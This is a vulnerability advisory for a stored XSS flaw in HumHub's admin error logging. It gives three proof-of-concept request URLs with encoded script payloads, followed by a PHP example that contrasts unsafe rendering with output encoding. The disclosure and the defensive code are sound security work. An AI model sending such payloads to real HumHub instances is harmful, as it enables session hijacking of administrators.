LEAKFREE-2014-007 / OSVDB-115637

HumHub index.php r Parameter Error Messages Stored XSS

[+] OSVDB-ID: OSVDB-115637
[+] LF-ID: LEAKFREE-2014-007
[+] CVSS: 7.0
[+] Vendor: HumHub
[+] Product: HumHub
[+] Versions affected: 0.10.0-rc1 and earlier

Vulnerability

In HumHub versions 0.10.0-rc1 and earlier, the admin error logging code is vulnerable to persistent (stored) XSS. Most modules' error logging performs no XSS sanitization on the error message before it is written to the database, and the admin error logging interface performs no sanitization before displaying it. Triggering an error with a URL-encoded XSS string in the request parameter (different modules' error logging allows for different XSS vectors) therefore causes the payload to be persistently logged and rendered in the admin error logging interface, potentially allowing an attacker, among other attack vectors, to hijack the admin's session.

Proof of Concept

index.php?r=post/post/post%3Csvg%20onload%3Dalert(1)%3E

index.php?r=mail/mail/indexdf%3Cimg%20src=%22x%22%20onerror=%22alert(1)%22%3E

index.php?r=notification/list/index&from=999)%3Cscript%3Ealert(1)%3C/script%3E

The above requests will insert the corresponding script elements into the admin error logging interface.

Mitigation

Upgrade to the latest HumHub release [1]
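The underlying defect is the absence of HTML encoding at the point where stored error messages are rendered. The following PHP script is an added illustration, not HumHub's own code: it renders constructed log entries (modelled on the decoded proof-of-concept strings above) first the vulnerable way, by concatenating the stored message straight into the markup, and then the hardened way, by encoding every untrusted value at the HTML output boundary. Function names, the table layout and the sample messages are assumptions for this example.

```php
<?php
// Added illustration (not HumHub code): rendering an admin error log safely.
// The "unsafe" renderer mirrors the flaw described in the advisory: the stored
// message is written into the page verbatim. The "safe" renderer encodes the
// message when it is output, so stored markup can never become live HTML.
declare(strict_types=1);

// Constructed sample entries. The messages contain the URL-decoded payloads
// from the proof-of-concept requests, as an error handler would log them.
$logEntries = [
    ['level' => 'error', 'message' => 'Unable to resolve the request "post/post/post<svg onload=alert(1)>".'],
    ['level' => 'error', 'message' => 'Unable to resolve the request "mail/mail/indexdf<img src="x" onerror="alert(1)">".'],
    ['level' => 'error', 'message' => 'Invalid value for parameter from: 999)<script>alert(1)</script>'],
];

// BEFORE (vulnerable): the message is concatenated raw into the table row.
function renderLogRowUnsafe(array $entry): string
{
    return '<tr><td>' . $entry['level'] . '</td><td>' . $entry['message'] . '</td></tr>';
}

// Encode a value for an HTML text or attribute context.
// ENT_QUOTES covers both quote styles so the same helper is safe inside
// attribute values; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning
// an empty string, which would otherwise silently drop a log line.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// AFTER (hardened): every untrusted field is encoded at output time.
function renderLogRowSafe(array $entry): string
{
    return '<tr><td>' . e($entry['level']) . '</td><td>' . e($entry['message']) . '</td></tr>';
}

// True if the rendered HTML still contains the raw, unencoded message, i.e.
// if any '<' or quote from the log content reached the page as markup.
function leaksRawMarkup(string $html, string $message): bool
{
    return strpos($html, $message) !== false;
}

// Render the admin log table both ways and report which one leaks markup.
function renderTable(array $entries, callable $rowRenderer): string
{
    $rows = array_map($rowRenderer, $entries);
    return "<table>\n" . implode("\n", $rows) . "\n</table>";
}

foreach ($logEntries as $entry) {
    $unsafe = renderLogRowUnsafe($entry);
    $safe   = renderLogRowSafe($entry);
    printf("unsafe row: %s\n", $unsafe);
    printf("safe row:   %s\n", $safe);
    printf("raw markup reaches the page -> unsafe: %s, safe: %s\n\n",
        leaksRawMarkup($unsafe, $entry['message']) ? 'yes' : 'no',
        leaksRawMarkup($safe, $entry['message']) ? 'yes' : 'no');
}

// Full tables, as an admin view would emit them.
echo renderTable($logEntries, 'renderLogRowSafe'), "\n";
```

Run with `php render_log.php` (any file name). For each entry the unsafe row reports that the raw markup reaches the page and the safe row reports that it does not, because `<`, `>` and both quote characters are converted to entities. Encoding at output rather than at storage time is the important design choice here: the advisory notes that different modules log through different paths with different vectors, and a single encoding step in the view covers all of them regardless of which module wrote the entry.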

References

1. https://github.com/humhub/humhub/releases

Contact

For more information or a no-obligation quote, you can contact us at contact@leakfree.nl (PGP)